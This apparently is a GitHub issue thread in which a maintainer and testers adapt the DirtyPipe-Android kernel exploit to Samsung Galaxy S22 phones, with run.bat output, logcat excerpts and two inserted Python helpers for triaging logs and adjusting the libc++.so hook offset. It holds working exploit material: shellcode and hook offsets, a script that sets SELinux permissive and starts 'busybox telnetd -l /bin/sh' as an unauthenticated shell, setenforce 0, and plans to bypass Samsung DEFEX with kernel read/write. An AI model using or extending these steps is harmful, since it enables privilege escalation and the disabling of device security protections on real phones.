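    r"avc:\s+denied\s+\{ (?P<perm>[^}]+)\}.*?scontext=u:r:vendor_modprobe:s0"
    r".*?tclass=(?P<tclass>\S+)\s+permissive=(?P<mode>[01])"
)


def triage(logcat_text):
    """Return which stages were observed, the lib_mod path if parsed, and
    every vendor_modprobe AVC denial as (permission, tclass, permissive)."""
    result = {name: False for name, _ in MARKERS}
    result["lib_mod"] = None
    result["avc"] = []
    for line in logcat_text.splitlines():
        for name, rx in MARKERS:
            m = rx.search(line)
            if m:
                result[name] = True
                if name == "modprobe_launched":
                    result["lib_mod"] = m.group(1)
        m = AVC.search(line)
        if m:
            result["avc"].append((m.group("perm").strip(), m.group("tclass"),
                                  m.group("mode") == "1"))
    return result


def furthest_stage(result):
    """Name of the last stage with a marker in the log, or 'nothing'."""
    reached = "nothing"
    for name, _ in MARKERS:
        if result[name]:
            reached = name
    return reached


# Constructed samples: copied from the logcat excerpts posted in this issue.
SAMPLE_DEBUG1 = """\
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)
"""
SAMPLE_DEBUG3 = """\
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2
"""
SAMPLE_BETA = """\
03-29 07:47:12.947  5656  5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:265): avc:  denied  { search } for  pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DEBUG3
    r = triage(text)
    print("furthest stage:", furthest_stage(r), "lib_mod:", r["lib_mod"])
    for perm, tclass, permissive in r["avc"]:
        print(f"  avc denied {{ {perm} }} tclass={tclass} permissive={int(permissive)}")
```

Usage: `python3 triage.py logcat.txt`. A log that reaches `modprobe_launched` but shows every vendor_modprobe denial with `permissive=0` is the debug3 situation; `permissive=1` on those lines means the beta build got as far as the module.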

Output of run.bat

dirtypipe-android: 1 file pushed, 0 skipped. 0.2 MB/s (45168 bytes in 0.186s)
startup-root: 1 file pushed, 0 skipped. 0.6 MB/s (3671 bytes in 0.006s)
magisk/busybox: 1 file pushed, 0 skipped. 85.1 MB/s (2102536 bytes in 0.024s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 58.6 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 8.5 MB/s (2824303 bytes in 0.318s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
Empty space size: 2096 bytes
Run index: 8
Stage1 debug filename: /dev/.dirtypipe-0008
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .

Logcat

It crashes before I can check if the /dev file exists. It does a kernel panic.

Yep, kernel panic/crash on my S22 Ultra

I am downloading SM-S908U kernel source code now

You missed debug1. But I found the problem in your log from debug2.

The first instruction has an unexpected value. It means a different compiler option was used for the S22.

Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f

Can you upload /system/lib64/libc++.so?

Sure...

/system/lib64/libc++.so

dirtypipe-android-1.0.3-beta2.zip

Thank you! Try this version and post the output of run.bat.

dirtypipe-android: 1 file pushed, 0 skipped. 4.2 MB/s (45296 bytes in 0.010s)
startup-root: 1 file pushed, 0 skipped. 3.7 MB/s (3671 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 68.7 MB/s (2102536 bytes in 0.029s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 59.2 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 35.3 MB/s (2824431 bytes in 0.076s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!
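Two of the device-specific checks in this thread can be done offline on a PC before touching the phone: picking a vendor library whose byte at file offset 0x1000 is 0x5f (the `grep "001000: 5f"` loop that produced the listing above), and looking at the first instruction at the hook offset in libc++.so, where 0xd503233f is the AArch64 PACIASP prologue that made the maintainer move the hook by +4 in 1.0.3-beta2. The following is an added example, not code from the DirtyPipe-Android project. The hook offset 0x5b260 and the instruction words (d503233f, a9be7bfd, 14012971) are taken from the outputs posted here; the fake libraries are constructed test data, and the interpretation of a leading `b` instruction as a hook left over from a previous run is this example's reading of the maintainer's note that a reboot is required to restore the original files.

```python
#!/usr/bin/env python3
"""Host-side triage helpers for porting DirtyPipe-Android to a new device.

Added example, not code from the DirtyPipe-Android project. Two checks
from this thread, runnable on an extracted vendor/lib or a pulled libc++.so:

  1. list vendor libraries whose byte at file offset 0x1000 is 0x5f ('_'),
     i.e. the files the thread's `xxd | grep "001000: 5f"` loop flags;
  2. read the instruction at the libc++.so hook offset and detect the PAC
     prologue 0xd503233f (PACIASP), in which case the hook moves to +4.

Offsets and instruction words come from the posted outputs; fake_lib() and
fake_vendor_dir() build constructed test data, not real libraries.
"""
import struct
import tempfile
from pathlib import Path

CANDIDATE_OFFSET = 0x1000   # file offset inspected by the thread's xxd | grep loop
CANDIDATE_BYTE = 0x5F       # '_': the byte value the loop greps for at that offset

PACIASP = 0xD503233F        # AArch64 `paciasp`: signs LR (x30) using SP as modifier
B_OPCODE_MASK = 0xFC000000  # top 6 bits of an A64 instruction word
B_OPCODE = 0x14000000       # 000101 -> unconditional `b imm26`


def has_candidate_marker(blob):
    """True when the byte at CANDIDATE_OFFSET equals CANDIDATE_BYTE."""
    return len(blob) > CANDIDATE_OFFSET and blob[CANDIDATE_OFFSET] == CANDIDATE_BYTE


def find_candidate_libs(libdir):
    """Python equivalent of the thread's shell loop over vendor/lib/*.so.

    Which candidate is safe to overwrite (rarely mapped at runtime) remains
    a judgement call, as the maintainer says above.
    """
    return sorted(str(p) for p in Path(libdir).glob("*.so")
                  if p.is_file() and has_candidate_marker(p.read_bytes()))


def insn_at(blob, offset):
    """One little-endian 32-bit A64 instruction word at a file offset."""
    if offset < 0 or offset + 4 > len(blob):
        raise ValueError(f"cannot read 4 bytes at {offset:#x}")
    return struct.unpack_from("<I", blob, offset)[0]


def is_branch(insn):
    """True for an unconditional `b` (0x14xxxxxx), e.g. 0x14012971 seen on reruns."""
    return (insn & B_OPCODE_MASK) == B_OPCODE


def resolve_hook_offset(blob, hook_offset):
    """Return (adjusted_offset, instruction_at_adjusted_offset, note).

    With a PACIASP prologue the hook goes at +4: `paciasp` stays in place,
    so LR is still signed for the function's later autiasp/retaa. A `b` as
    first instruction means the page most likely still holds a hook from an
    earlier run; per the maintainer, a reboot restores the original file.
    """
    insn = insn_at(blob, hook_offset)
    if insn == PACIASP:
        return hook_offset + 4, insn_at(blob, hook_offset + 4), "paciasp: hook moved +4"
    if is_branch(insn):
        return hook_offset, insn, "already patched: reboot to restore"
    return hook_offset, insn, "plain prologue"


def resolve_hook_offset_in_file(path, hook_offset):
    return resolve_hook_offset(Path(path).read_bytes(), hook_offset)


def fake_lib(hook_offset, insns):
    """Constructed stand-in for a library: zeros, with insns at hook_offset."""
    blob = bytearray(hook_offset + 4 * len(insns))
    for i, insn in enumerate(insns):
        struct.pack_into("<I", blob, hook_offset + 4 * i, insn)
    return bytes(blob)


def fake_vendor_dir():
    """Temp dir with two constructed .so files; only libcandidate.so carries
    the 0x5f marker at 0x1000 (the bytes libcamxifestriping.so shows)."""
    d = Path(tempfile.mkdtemp(prefix="vendor_lib_"))
    marked = bytearray(CANDIDATE_OFFSET + 16)
    marked[CANDIDATE_OFFSET:CANDIDATE_OFFSET + 16] = b"_handle_nullabil"
    (d / "libcandidate.so").write_bytes(marked)
    (d / "libother.so").write_bytes(bytes(CANDIDATE_OFFSET + 16))
    return str(d)


if __name__ == "__main__":
    print(find_candidate_libs(fake_vendor_dir()))
    # paciasp; stp x29, x30, [sp, #-32]!  (the pair reported by 1.0.3-beta2)
    print(resolve_hook_offset(fake_lib(0x5B260, [PACIASP, 0xA9BE7BFD]), 0x5B260))
```

On a real pull, `resolve_hook_offset_in_file("libc++.so", 0x5B260)` returns `(0x5b264, 0xa9be7bfd, ...)` for the S22 Ultra build discussed here; if it reports a `b` instead, the page cache still holds the previous run's hook and the device should be rebooted before trying again, exactly as the maintainer asks.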

Did the device reboot? How about adb logcat?

The second time I ran it, it said "press any key to continue" then crashed, but the first time through it didn't say "press any key to continue" and didn't crash either.

That seems a good sign.
Run adb shell, then logcat -d | grep modprobe and logcat -d | grep libc

It seems to have succeeded. Didn't you get a root shell?

03-29 07:47:12.947  5656  5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:265): avc:  denied  { search } for  pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:267): avc:  denied  { read open } for  pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

Nope, unless I am doing something wrong. I double-click the run.bat and it runs up to saying "It worked!" then just sits there. Then, if I run it a second time, it crashes.

This time I ran it; the first time it said it worked, then I pressed enter and it said "press any key to continue", then AUTH, but the terminal just closed and nothing happened.

So, add the following 3 lines to startup-root, then retry:

HOST=127.0.0.1
PORT=10847

logwrapper echo startup-root ok
logwrapper id
/data/local/tmp/busybox telnetd -l /bin/sh -p 10848 &

export ANDROID_DATA=/data
export ANDROID_ART_ROOT=/apex/com.android.art

Then try /data/local/tmp/busybox telnet 127.0.0.1 10848 in adb shell.
And upload logcat again.

I added the 3 lines and ran run.bat, then adb shell, and the telnet command keeps returning connection refused.

Did you launch run.bat after editing startup-root?

Yes lol

startup-root.txt

Did I edit it right? Just remove the .txt file extension.

Yes. That's right.
I could not find any clue in logcat3.txt. Can you reboot the device and retry?

dirtypipe-android-1.0.3-beta3.zip

I added more logging and setenforce 0 to startup-root.
Try it. You don't need to edit startup-root.

Here is after a reboot, still with beta2. Trying beta3 now.
logcat4.txt

No modprobe output in the log. Very strange...

PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 21.1 MB/s (45296 bytes in 0.002s)
startup-root: 1 file pushed, 0 skipped. 1.5 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 87.2 MB/s (2102536 bytes in 0.023s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 114.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 26.5 MB/s (2821955 bytes in 0.102s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 9
Stage1 debug filename: /dev/.dirtypipe-0009
Shell code size: 344 0x158 bytes
It worked!

AUTH
Press any key to continue . . .
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
telnet: can't connect to remote host (127.0.0.1): Connection refused
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell
b0q:/ $ getenforce
Enforcing
b0q:/ $ exit
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 65.5 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 5.6 MB/s (1195 bytes in 0.000s)
magisk/busybox: 1 file pushed, 0 skipped. 109.9 MB/s (2102536 bytes in 0.018s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 115.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 45.0 MB/s (2821955 bytes in 0.060s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
Empty space size: 2096 bytes
Run index: 10
Stage1 debug filename: /dev/.dirtypipe-0010
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>
logcat5.txt

Could you run it on command prompt? Sometimes PowerShell does bad things.

AUTH message is very strange...
I have never seen that message.

I think I only see the logcat of the second attempt of run.bat.

C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 29.7 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 1.3 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 118.0 MB/s (2102536 bytes in 0.017s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 106.9 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 24.7 MB/s (2821955 bytes in 0.109s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
Empty space size: 2096 bytes
Run index: 12
Stage1 debug filename: /dev/.dirtypipe-0012
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .
C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 34.6 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 1.7 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 116.2 MB/s (2102536 bytes in 0.017s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 112.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 33.7 MB/s (2821955 bytes in 0.080s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 12
Stage1 debug filename: /dev/.dirtypipe-0012
Shell code size: 344 0x158 bytes
It worked!
id
AUTH
Press any key to continue . . .
C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>

I think I only see the logcat of the second attempt of run.bat.

it was twice.. I run logcat then run.bat then when it's done and doesn't do anything I run it again and it crashes.. same output.. @oakieville can you try it on your S22?

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices.
We might need some help from experienced devs.

A second run without reboot always fails, because after the first run the libs are not restored properly.
Can you upload the logcat when it is run only once?

dirtypipe-android: 1 file pushed, 0 skipped. 58.6 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 2.4 MB/s (1195 bytes in 0.000s)
magisk/busybox: 1 file pushed, 0 skipped. 150.3 MB/s (2102536 bytes in 0.013s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 139.8 MB/s (672928 bytes in 0.005s)
4 files pushed, 0 skipped. 1.0 MB/s (2821955 bytes in 2.714s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 5
Stage1 debug filename: /dev/.dirtypipe-0005
Shell code size: 344 0x158 bytes
It worked!

beta 3 stopped there for me

modprobe-payload: Successfully set permissive in logcat

adb shell getenforce
Enforcing
logcatbeta3.txt

stat: '/dev/.dirtypipe-0005': Permission denied

Thanks. There are logs similar to the ones @elliwigy provided:

03-29 09:01:47.097 16957 16957 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:246): avc:  denied  { search } for  pid=16958 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:247): avc:  denied  { execute } for  pid=16958 comm="modprobe" name="startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:248): avc:  denied  { read open } for  pid=16958 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered

According to this log, the kernel module was successfully loaded and set permissive.

Can you run adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 in another command prompt, leaving the run.bat prompt untouched?

telnet: can't connect to remote host (127.0.0.1): Connection refused

however this device is not physically connected to my pc it is shared remotely

not sure if that matters

Seeing permissive in logcat got me excited for a minute; even with only permissive I believe I can do my main goal.

Yep. I think we are nearly at the goal (permissive + root shell).

I built the version to completely set permissive. (getenforce will output Permissive)
dirtypipe-android-1.0.3-beta4.zip
But perhaps we still can't get a root shell.

I think we are blocked by some Samsung security mechanism.
I will check the kernel source after tomorrow.

Thank you for testing for a long time today.

adb shell getenforce
Permissive
well look at that

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

That said, I am no expert by any means but unfortunately there aren't many devs working on USA/Snap model Samsungs for a while now lol.. Maybe some other devs for other devices can help, there has to be a universal method.. too bad fire30 won't release his methods 🥱

You are a pro in my book and I appreciate your help.. We are so close and I bet it's something simple we are missing.. Is there any other way besides Telnet?

One root method back in S8 days that worked (there were a few exploits I daisy chained) that even chainfire was surprised worked is we had an su binary in system/xbin but couldn't execute it and one day I was messing around and typed "adb shell setsid su" and sure enough it opened a root shell lol.. or another time I used uevent_helper and pushed a script there that was executed by the kernel and installed root for me.. or another I used a qti_init script on param that was executed by init when setting a prop value via setprop or even cmdline injection I found that passed properties via bootloader by changing the serialno lol.. point is, there has to be something we can use :-)

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848

r0q:/ $
connected but not root
it is permissive however

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

That's great! Do you have experience with DEFEX?
I have found an explanation of DEFEX.
It possibly prevents our startup-root from executing.
Any idea on how to disable/bypass DEFEX?
We can now execute any code in a kernel module. So, we can modify DEFEX's internal data, I think.

I uploaded kernel code of Galaxy S22.
https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848

r0q:/ $ connected but not root it is permissive however

How did you launch telnetd? From a normal (non-root) shell?
If so, it is expected behavior.

Can you run the dmesg command in adb shell?
The kernel log might help to debug the issue.

Yes, shortly I'll run it. Unfortunately I don't know DEFEX, but I do have the kernel source downloaded.

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

That's great! Do you have experience with DEFEX? I have found an explanation of DEFEX. It possibly prevents our startup-root from executing. Any idea on how to disable/bypass DEFEX? We can now execute any code in a kernel module. So, we can modify DEFEX's internal data, I think.

I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however

How did you launch telnetd? From a normal (non-root) shell? If so, it is expected behavior.

Yes, normal shell as no root shell was presented (maybe I did something wrong but it seems to have run correctly)

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

That's great! Do you have experience with DEFEX? I have found an explanation of DEFEX. It possibly prevents our startup-root from executing. Any idea on how to disable/bypass DEFEX? We can now execute any code in a kernel module. So, we can modify DEFEX's internal data, I think.

I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however

How did you launch telnetd? From a normal (non-root) shell? If so, it is expected behavior.

I honestly didn't think they were still using defex but back on Oreo it was a simple hex patch that bypassed it in the kernel.. magisk automatically patches it to my understanding..

maybe can use another location shell has access to such as

/data/user_de/0/com.android.shell/files

Which is the path for /bugreports

Is also where bugreports are created/stored.. Not sure if it's a "safe place" or not by defex standards.. Magisk is sometimes executed from /data/adb which of course needs privs to access it

Either way, we know it's possible since fire30 was able to get a root shell on p6 and s22 devices.. he uses an app however so maybe he gets around it somehow by using the app's directory instead of data/local/tmp? Maybe using termux or something like andronix to run linux within termux can help?

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

That's great! Do you have experience with DEFEX? I have found an explanation of DEFEX. It possibly prevents our startup-root from executing. Any idea on how to disable/bypass DEFEX? We can now execute any code in a kernel module. So, we can modify DEFEX's internal data, I think.

I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however

How did you launch telnetd? From a normal (non-root) shell? If so, it is expected behavior.

Would we use startup-root to edit code, or do we need to build a kernel module to do things?

It is possible to (temporarily) bypass DEFEX by using paths other than /data/local/tmp, but ultimately a kernel solution to completely disable DEFEX is inevitable.
Given that we already have arbitrary kernel read/write, the solution will be straightforward, like binary patching in the kernel module.

Honestly, I'm not interested in bypassing/disabling DEFEX, because it is Samsung-specific and I don't have the device.

Why not learn C language and kernel development to complete the work? @elliwigy

I do know some C code and def. know kernel development.. Also, I am not sure Defex is the cause as I haven't seen it referenced anywhere in logs for example. So essentially a root shell would be nice, then I can work on other things, but I simply don't have the time to learn a new language in detail due to my regular job unfortunately

What are all these things?

|b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al
total 2781
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\n\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\n:\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\nnt
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n\ 
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n]:\ cant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r\nant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\nt
drwxrwx--x 3 shell shell    3452 2022-03-31 02:36 .
drwxr-x--x 6 root  root     3452 1969-12-31 19:13 ..
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 127
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 :
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1223]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1239]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1347]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1949]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [196]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1984]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [201
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2618]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2998]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [30
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3174]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3384]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3424]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3790]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4160]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4241]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4244]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4628]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4641
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4771]:
